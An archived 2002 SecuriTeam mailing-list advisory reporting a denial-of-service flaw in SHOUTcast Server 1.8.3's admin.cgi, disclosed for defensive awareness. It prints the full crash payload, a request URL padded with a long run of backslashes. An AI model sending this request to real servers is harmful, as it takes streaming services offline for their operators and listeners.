[EXPL] SHOUTcast Vulnerable to Malformed CGI Request (admin.cgi)
From: support@securiteam.comDate: 01/29/02
- Previous message: support@securiteam.com: "[NEWS] CwpApi's GetRelativePath() Returns Invalid Paths"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Tue, 29 Jan 2002 22:16:09 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
SHOUTcast Vulnerable to Malformed CGI Request (admin.cgi)
------------------------------------------------------------------------
SUMMARY
<http://www.shoutcast.com/> SHOUTcast is a Winamp-based distributed
streaming audio system by Nullsoft. This product contains a security
vulnerability that allows attackers to cause the server to crash by
sending it a malformed CGI request.
DETAILS
Vulnerable systems:
SHOUTcast Server version 1.8.3 (Win32)
Exploit:
By requesting the URL:
http://some-shoutcast-server:8888/admin.cgi?\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
The server will no longer function.
ADDITIONAL INFORMATION
The information has been provided by <mailto:bditt@columbus.rr.com> Brian
Dittmer.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] CwpApi's GetRelativePath() Returns Invalid Paths"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- SSRT3509 Potential Security Vulnerability in CIFS/9000 Server
... SSRT3509 Potential Security Vulnerability in CIFS/9000 Server ... Bulletin
provided that it remains complete and intact. ... (comp.security.misc) - SSRT3509 Potential Security Vulnerability in CIFS/9000 Server
... SSRT3509 Potential Security Vulnerability in CIFS/9000 Server ... Bulletin
provided that it remains complete and intact. ... (comp.security.unix) - SSRT3509 Potential Security Vulnerability in CIFS/9000 Server (rev.1)
... SSRT3509 Potential Security Vulnerability in CIFS/9000 Server ... Bulletin
provided that it remains complete and intact. ... (comp.security.misc) - SSRT3509 Potential Security Vulnerability in CIFS/9000 Server (rev.1)
... SSRT3509 Potential Security Vulnerability in CIFS/9000 Server ... Bulletin
provided that it remains complete and intact. ... (comp.security.unix) - SSRT3509 Potential Security Vulnerability in CIFS/9000 Server (rev.1)
... SSRT3509 Potential Security Vulnerability in CIFS/9000 Server ... Bulletin
provided that it remains complete and intact. ... (comp.sys.hp.hpux)